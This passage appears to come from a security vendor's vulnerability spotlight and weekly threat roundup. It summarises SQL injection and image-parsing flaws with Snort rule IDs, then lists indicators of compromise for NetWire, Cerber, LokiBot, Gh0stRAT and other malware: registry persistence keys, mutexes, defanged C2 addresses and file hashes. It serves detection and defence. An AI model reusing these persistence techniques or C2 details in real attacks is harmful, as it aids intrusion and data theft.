Description: There are three SQL injection vulnerabilities in the authenticated portion of the Forma Learning Management System. LMS is a set of software that allows companies to build and host different training courses for their employees. The software operates with an open-source licensing model and now operates under the Forma organization. An attacker can send a web request with parameters containing SQL injection attacks to trigger these bugs.
Snort SIDs: 51611 – 51619 (By Marcos Rodriguez)

Title: Accusoft ImageGear PNG IHDR width code execution vulnerability 
Description: Accusoft ImageGear contains two remote code execution vulnerabilities. ImageGear is a document and imaging library from Accusoft that developers can use to build their applications. The library contains the entire document imaging lifecycle. This vulnerability is present in the Accusoft ImageGear library, which is a document-imaging developer toolkit.
Snort SIDs: 3132, 32889, 50806, 50807, 51530, 51531, 52033, 52034 (By Kristen Houser and Mike Bautista)

Most prevalent malware files this week

SHA 256: f917be677daab5ee91dd3e9ec3f8fd027a58371524f46dd314a13aefc78b2ddc
MD5: c5608e40f6f47ad84e2985804957c342
Typical Filename: FlashHelperServices.exe
Claimed Product: Flash Helper Service
Detection Name: PUA:2144FlashPlayer-tpd

SHA 256:a97e5396d7dcd103138747ad09486671321fb75e01a70b26c908e7e0b727fad1 
MD5: ef048c07855b3ef98bd991c413bc73b1
Typical Filename: xme64-501.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Razy::tpd

SHA 256:49b9736191fdb2eb62b48e8a093418a2947e8d288f39b98d65a903c2ae6eb8f5
MD5: df432f05996cdd0973b3ceb48992c5ce
Typical Filename: xme32-501-gcc.exe
Claimed Product: N/A
Detection Name: W32.49B9736191-100.SBX.TG 

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f 
MD5: e2ea315d9a83e7577053f52c974f6a5a 
Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin 
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 8c0b271744bf654ea3538c6b92aa7bb9819de3722640796234e243efc077e2b6 
MD5: f7145b132e23e3a55d2269a008395034 
Typical Filename: 8c0b271744bf654ea3538c6b92aa7bb9819de3722640796234e243efc077e2b6.bin 
Claimed Product: N/A
Detection Name: Unix.Exploit.Lotoor::other.talos 

Threat Roundup for November 29 to December 6

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 29 and Dec. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:
Threat NameTypeDescription
Win.Malware.NetWire-7428720-1 Malware NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Ransomware.Cerber-7419509-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, this is no longer the case.
Win.Trojan.LokiBot-7420275-1 Trojan Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents attached to spam emails.
Win.Dropper.Gh0stRAT-7414189-0 Dropper Gh0stRAT is a well-known family of RATs designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Trojan.Zbot-7414153-0 Trojan Zbot, also known as Zeus, is trojan that steals information such as banking credentials using methods like key-logging and form-grabbing.
Doc.Downloader.Emotet-7413880-1 Downloader Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails.
Win.Dropper.Tofsee-7431752-0 Dropper Tofsee is multi-purpose malware that features several modules that send spam messages, conduct click fraud, mine cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator’s control.
Win.Downloader.Phorpiex-7428338-0 Downloader Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, from malware to send spam emails to ransomware and cryptocurrency miners.

Threat Breakdown

Win.Malware.NetWire-7428720-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\NETWIRE 14
<HKCU>\SOFTWARE\NETWIRE
Value Name: HostId
14
<HKCU>\SOFTWARE\NETWIRE
Value Name: Install Date
14
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644} 13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKLM
13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644}
Value Name: StubPath
13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MServices
1
MutexesOccurrences
Global\<random guid>16
imDfesUY13
xtWSWREb1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
cobroserfinansa[.]com14
Files and or directories createdOccurrences
%APPDATA%\Install15
%TEMP%\<random, matching '[a-z]{4,9}'>.exe15
%APPDATA%\Install\winlogon.exe14
%TEMP%\7176.dmp1
%APPDATA%\Install\MServicesNet.exe1
%TEMP%\7134_appcompat.txt1

File Hashes

038157ed389233fc4aae039df0806789f2c92b6e3947f36bc8f086ae16a7fd4e 182dadc51371a709b901f1de489a52ff7295749427a8cf9d112358a605e2ed6d 33d4c44c967c9ab53f3d04b0d11ac38f9fbc3f9d16e65cca170bd8c937589038 3cf7e6a7776e15f8c01bde5788e5e7dbbe25beb37e977abe38b3b4cb256c3ec3 527ff73f2e6d99bbcc7fa02804ab7380e2fe12689b70bb1b0840ac1b02331a93 5aa45dcf729d53a3fc6e5d02980835fe78f3f7b7ae262b8aebf2edb6abb59bc4 5f86aa7181604fadc92f1a976fdfff892cd9b515e59939d93941907a35762888 6485a616654adee2d573a983c687a8d8ea3d126dfbf86df3a065c5e7846bd57b 7746199aba6ad47bf92515db686f3a5e2accbdb2b7f480ac2af1e2c5c377a8eb 79aa89119d9e26dc366a7af72d47c323168d2ad881bca31e9075a41f5ce081f2 905b2347215e7ce0f02f8e7274941982c56c1b817fbfd4b9eaf97d2a65f6146d 91856d29ac1f9720917a40e5533c7dacf528b25acfb5a82a00f6882b053c9b5a b18a45a4345f442efcc02d6efb9110b9e35bb98fac4613c83a39fecbee78aaa4 d26438798f502364eea85bbf2804165d0709b90833ddf4512f95ac77f881edaf de8be762d85eb4014992a174acd115de70b89884d21933d7e972e6d4972904fe def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa e0acbefe824d29143e303ba8596d1436150bf1ad7ec533b56e4ae2b1bafcf07f ea34a08deaac08c7f79e6cd2e94a74ad5b0c95dec43f81e0a218d957088b8f10

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Ransomware.Cerber-7419509-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\16000009
Value Name: Element
12
<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\250000E0
Value Name: Element
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: Run
12
<HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR
Value Name: AutoRun
12
<HKCU>\CONTROL PANEL\DESKTOP
Value Name: SCRNSAVE.EXE
12
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} 12
<HKCU>\PRINTERS\DEFAULTS 12
<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\250000E0 12
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_01
12
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_00
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: dnscacheugc
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: dnscacheugc
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: javaw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: javaw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vssadmin
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: vssadmin
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: TCPSVCS
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: TCPSVCS
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lodctr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: lodctr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: instnm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: instnm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bootcfg
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: bootcfg
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ctfmon
1
MutexesOccurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF}12
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
216[.]239[.]38[.]214
216[.]239[.]32[.]213
216[.]239[.]36[.]213
216[.]239[.]34[.]212
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ipinfo[.]io12
Files and or directories createdOccurrences
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}12
%System32%\Tasks\dnscacheugc2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\dnscacheugc.lnk2
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\dnscacheugc.exe2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\bootcfg.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\bootcfg.exe1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\vssadmin.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\vssadmin.exe1
%System32%\Tasks\vssadmin1
%System32%\Tasks\bootcfg1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\ctfmon.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\ctfmon.exe1
%System32%\Tasks\ctfmon1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\resmon.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\resmon.exe1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\newdev.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\newdev.exe1
%System32%\Tasks\mfpmp1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\mfpmp.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\mfpmp.exe1
%System32%\Tasks\javaw1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\javaw.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\javaw.exe1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\TCPSVCS.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\TCPSVCS.EXE1
*See JSON for more IOCs

File Hashes

0e1509af88618c8cb273196c4213e26c2219c3a1fba9ed8c51a22d871e316ccc 1d07399e5b31727fc4dadba07d062f7eff6864e33f17fb1a65f71b9b41b61282 34a0f0bc799b5fd0cf9a89bce7d2ca2da158cf22940212b5c09fb1ec64bc9b65 4a60b63273210c8ebc4e6d07fba9b331011f852f4f5c1b5b1ae7ab5aa7df0f03 8a6c828f54dc34e260698e0347cce9e62d8fbc773e265c39c63e812201533724 8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5 b590d46794fad9c62040ce7941cf775282d1939c45267ec955e9be6ee8dd092a b8058ef9c3394ce2ea9318b06d6cf01080a0ad4ce87ee1cff78e57373192603e bbd6aadc606953b27f5592a2da7909949616b81b4f767ded89119644a71d2dd7 c8af6329fcfdfd4f9df33f2f4f59fb958e2416eebe8d78ab1444e763cf04d08c ce2b0b2037810060edbf86fc7ac78c5e0d4771b79181e39718498b02195e3642 efda569c35853456630d1e2fa27973aeb6386338f163ca0f60e3fbb4643a5b87

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid




Win.Trojan.LokiBot-7420275-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS 17
<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\SETTINGS\LEAKDIAGNOSISATTEMPTED 12
<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\QUOTATION.EXE 2
<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\QUOTATION.EXE
Value Name: LastDetectionTime
2
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\QUOTATION 2
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\QUOTATION\OPTIONS 2
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\FILENAME 2
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\FILENAME\OPTIONS 2
<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\46646D0F2E8E990ABE331586D98FE95A61DC40D7CB2C05144A09FD8B956F7526.EXE
Value Name: LastDetectionTime
1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\2374D2482BFECB87307D036B7E9750A0C28738C8A0AFD4ABF60A9B9EA3B81E83\OPTIONS 1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9\OPTIONS 1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674 1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\2374D2482BFECB87307D036B7E9750A0C28738C8A0AFD4ABF60A9B9EA3B81E83\OPTIONS
Value Name: Show Tips at Startup
1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9\OPTIONS
Value Name: Show Tips at Startup
1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674\OPTIONS 1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674\OPTIONS
Value Name: Show Tips at Startup
1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\938456E91538B5F4267BEDB11D8CCA26229F3DBDB3C24FF3A1132F3970C0D24A\OPTIONS 1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\938456E91538B5F4267BEDB11D8CCA26229F3DBDB3C24FF3A1132F3970C0D24A\OPTIONS
Value Name: Show Tips at Startup
1
<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674.EXE 1
<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9.EXE 1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\PAYMENT 1
<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674.EXE
Value Name: LastDetectionTime
1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\PAYMENT\OPTIONS 1
<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9.EXE
Value Name: LastDetectionTime
1
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\PAYMENT\OPTIONS
Value Name: Show Tips at Startup
1
MutexesOccurrences
3749282D282E1E80C56CAE5A15
eDZwOHM31
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
80[.]249[.]144[.]954
185[.]55[.]225[.]2423
107[.]175[.]150[.]733
185[.]159[.]153[.]1292
208[.]91[.]199[.]2251
104[.]16[.]154[.]361
142[.]11[.]234[.]2321
185[.]53[.]90[.]101
104[.]148[.]41[.]601
185[.]132[.]53[.]1381
167[.]172[.]184[.]1851
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
iranssp[.]ir2
beyondlogx[.]com2
whatismyipaddress[.]com1
phoenixdevs[.]ir1
kontrolreport[.]com1
offsolo-gbb[.]tech1
ray-den[.]xyz1
avertonbullk[.]com1
secure-n2[.]top1
smtp[.]betaflexllc[.]us1
protestlabsmovings[.]es1
oscontinental[.]online1
porno322[.]com1
Files and or directories createdOccurrences
%APPDATA%\D282E115
%APPDATA%\D282E1\1E80C5.lck15
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c515
%HOMEPATH%\subfolder5
%HOMEPATH%\subfolder\filename.exe2
%HOMEPATH%\subfolder\filename.vbs2
%HOMEPATH%\subfolder\quotation.exe2
%HOMEPATH%\subfolder\quotation.vbs2
%APPDATA%\pid.txt1
%APPDATA%\pidloc.txt1
%TEMP%\holdermail.txt1
%TEMP%\holderwb.txt1
%TEMP%\bhvC037.tmp1
%HOMEPATH%\subfolder\payment.exe1
%HOMEPATH%\subfolder\payment.vbs1

File Hashes

02b5ef62978197b43a62d05de25c67a67cb1b4a0f09111e79cc83688e7881674 2374d2482bfecb87307d036b7e9750a0c28738c8a0afd4abf60a9b9ea3b81e83 2a3ad80cfac1cd63eeba8f7d8019df51df16e22ef34d2826d0aba9a56cff5c60 2eee4a29498a0d25c8d53e306c3b2414b839363992364cabbbe3fe2fd46caa9c 32f8e0daef5bb91fb0908277ad5f5d2c97398a64a8c9ff60611a103ba0d5004f 46646d0f2e8e990abe331586d98fe95a61dc40d7cb2c05144a09fd8b956f7526 4b4ba6c0f8cbadc871bcc6b3e175a569fe292973499bbf239aaaff7e75495888 548bacb5d7484fd4d4328579d18b3e62fdbf6bb7acdf6ade4ddcf6a0db61847b 7936c85dd96e641541e6e39e7a7388b8b6b16ef97569a81efceaed4abdc62ad6 938456e91538b5f4267bedb11d8cca26229f3dbdb3c24ff3a1132f3970c0d24a bb71b57a4cbf596fb6978df0e6fbdfbbbdebec8d182a62c6ecfbaa5261117aba c5bb3fd84e761402d2da77b8c0462e9f670f56d65f3ccd602cfb4326c98c4c9a c5f72bae432197bdbef019507fe69905549bbb7dcf9c455bd24e6eef008e96ea cbb00a83c374bcca6a2bf0cbfabaf1f5c655d9cb046437225bbbd04988f22811 df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e e329ca0b2964c410ba3c5d228a13b27d733d7f9999dee5a6511f91ea891473a9 ebe841b611a116cee961119df457aaa5f8b5ada4dc6e93381d59d2bb12bdf522

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Dropper.Gh0stRAT-7414189-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: EM
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Micro
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: SHR
12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
2
<HKLM>\SOFTWARE\MICROSOFT\OLE
Value Name: EnableDCOM
2
<HKLM>\SOFTWARE\MICROSOFT\OLE
Value Name: EnableRemoteConnect
2
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\LSA
Value Name: restrictanonymous
2
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SECURITYPROVIDERS\SCHANNEL\PROTOCOLS\PCT1.0\SERVER
Value Name: Enabled
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LANMANSERVER\PARAMETERS
Value Name: AutoShareWks
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LANMANSERVER\PARAMETERS
Value Name: AutoShareServer
2
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SECURITYPROVIDERS\SCHANNEL\PROTOCOLS\PCT1.0 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Depend
2
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SECURITYPROVIDERS\SCHANNEL\PROTOCOLS\PCT1.0\SERVER 2
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
Value Name: Blob
1
<HKCU>\SOFTWARE\CSER_513_2 1
<HKCU>\SOFTWARE\CSER_513_2\14B65331773AD534DADA9C7B055E34A1E6AB2A54F3D8EEC4D1DA6298F0477C71 1
<HKCU>\SOFTWARE\CSER_513_2\14B65331773AD534DADA9C7B055E34A1E6AB2A54F3D8EEC4D1DA6298F0477C71\GAMESETTING 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ce
1
MutexesOccurrences
0x5d65r455f25
Mhost123.zz.am:665825
host123.zz.am:665825
107.163.241.193:652017
M107.163.241.193:652017
107.163.56.251:665812
M107.163.56.251:665812
{1B655094-FE2A-433c-A877-FF9793445069}1
Local\https://pos.baidu.com/1
Global\a80e8341-11ce-11ea-a007-00501e3ae7b51
D1
CiM1
Crack iN Morroco 2k71
174.139.81.2:32041
M174.139.81.2:32041
Global\a9c98181-11ce-11ea-a007-00501e3ae7b51
Local\https://www.onlinedown.net/1
root em up1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
107[.]163[.]43[.]14325
107[.]163[.]43[.]23525
107[.]163[.]43[.]23625
49[.]7[.]37[.]12623
107[.]163[.]241[.]19317
107[.]163[.]241[.]18515
107[.]163[.]241[.]18615
107[.]163[.]56[.]25112
107[.]163[.]43[.]16112
107[.]163[.]56[.]240/3112
107[.]163[.]241[.]1812
107[.]163[.]43[.]1442
107[.]163[.]241[.]1822
204[.]79[.]197[.]2001
111[.]202[.]114[.]811
104[.]192[.]110[.]2451
103[.]235[.]46[.]1911
180[.]163[.]251[.]2311
172[.]217[.]197[.]1551
185[.]10[.]104[.]1201
172[.]217[.]7[.]141
218[.]30[.]115[.]1231
218[.]30[.]115[.]2541
39[.]156[.]66[.]1081
113[.]96[.]178[.]351
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
blogx[.]sina[.]com[.]cn25
blog[.]sina[.]com[.]cn25
host123[.]zz[.]am25
s[.]360[.]cn1
cpro[.]baidustatic[.]com1
flashservice[.]adobe[.]com1
www[.]beian[.]gov[.]cn1
zz[.]bdstatic[.]com1
dup[.]baidustatic[.]com1
www[.]google-analytics[.]com1
stats[.]g[.]doubleclick[.]net1
www[.]yisu[.]com1
js[.]users[.]51[.]la1
ia[.]51[.]la1
www[.]pcsoft[.]com[.]cn1
www[.]onlinedown[.]net1
si[.]trustutn[.]org1
e[.]so[.]com1
sqdownb[.]onlinedown[.]net1
www[.]idc400[.]com1
bgp[.]zzidc[.]com1
hj[.]dun[.]gsxzq[.]com1
news[.]onlinedown[.]net1
s[.]ssl[.]qhres[.]com1
uuid[.]users[.]51[.]la1
*See JSON for more IOCs
Files and or directories createdOccurrences
\1.txt55
%ProgramFiles%\<random, matching '[a-z]{5,9}\[a-z]{3,9}'>.dll54
%TEMP%\<random, matching '[a-z]{4,9}'>.exe50
%ProgramFiles%\<random, matching '[a-z]{5,8}'>49
%ProgramFiles%\<random, matching '[a-z]{5,9}\[a-z]{3,9}'>.exe39
%TEMP%\<random, matching '[a-z]{8}'>.exe11
%TEMP%\1.reg2
%ProgramFiles%\korlu\112214502
%ProgramFiles%\fsshxf\112715082
%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe2
%APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx1
\tre.bat1
%TEMP%\slseyc\nfiav.dll1
\a.bat1
%ProgramFiles%\vpcat\112715081
%ProgramFiles%\blzmv\112715081
%ProgramFiles%\zuxlr\112715081
%ProgramFiles%\hyabka\112715081
%ProgramFiles%\gkzmahvre\112715081
%ProgramFiles%\gkzmahvre1
%ProgramFiles%\yudusnhlp\112715081
%ProgramFiles%\jkixqof\112715081
%ProgramFiles%\yudusnhlp1
%ProgramFiles%\tjsmc\112715081
%ProgramFiles%\ezsor\112715081
*See JSON for more IOCs

File Hashes

00275609032024a2a413b2697b6763c964a5eeb54709ae803b68d5a77d1b46a4 019f88e9cc8c503c1ac8c6054beb978b445922cf5857f347bc8b2193a0592e82 037e1df212fbfc6c77ea55754f52b11366da8e0fd5437834762339a30e705614 04d5f107aa253ca81d99fce0201dcb6da6b21497fce62e2d37a90661951c63d8 06ee23a5be29f166749cd47784c9dafe66c0ca4ec7b70e6e837e59ccd5a02c63 072e4fa823cf7e9646dd7e1aaa3a308d9e789700dccffacfb646bf7c7fad9ad3 07ffdb94e32a95dc75d39528b3bddc362006719fc0970c47259fc8debeaee066 08e84db9a91341f82d0dc50775e75879fc2ac20ede3abffe53cf35dc9a656019 094797bbc7234e18f2a7a30fc182a690f2f7f7b080b889ab5e6c87bb730bc911 0a03aba2e42912a9c43e5cd9c724c4991007ecd6950bda27e82446070a08bb02 0a44d155b4568d97d161d18e90e4c9e719e4c37769c2a32ca5a41d56cc101172 0af079ed6e9914b102d9c3007e7c96318a1fdb659212c35f22e2e5293d8cbeb9 0c7cf7681e128b45acaf925d598acf037177748402ab92fdf114a4d2dc5fd4ae 0dc8ab2ec624c65ff0c071b80b349c8e6de4fc4491e9751e099b63ce98c8c52e 0dd6bc63d982e053c01753cb5819362827bde9338b3d28a0b17669c0523489e0 0f75c94f848e561c2fe1bd90a5260e47267c334444579530ddfe2ad90f0e6806 1035eeb50c81c381f7b2909d062fb6d51d9e6ddc8c68478a3ef67d7b4a67b0f6 10eab7f3db36eacd08880c4998ab351c535f8b728cb0ed484edd0e84b5bdaf03 10fa3fefcb91d40da3285b063a8fd2c2f9187c1990689a487f1f2fea4a2e9240 12ebbeecf708d23ad4b4510374a622df85f5aaa806939204357f3d330b6de8d7 1439afcf233b1c829cbac8747623b3b05332ecd057660bc3639980ada64d1149 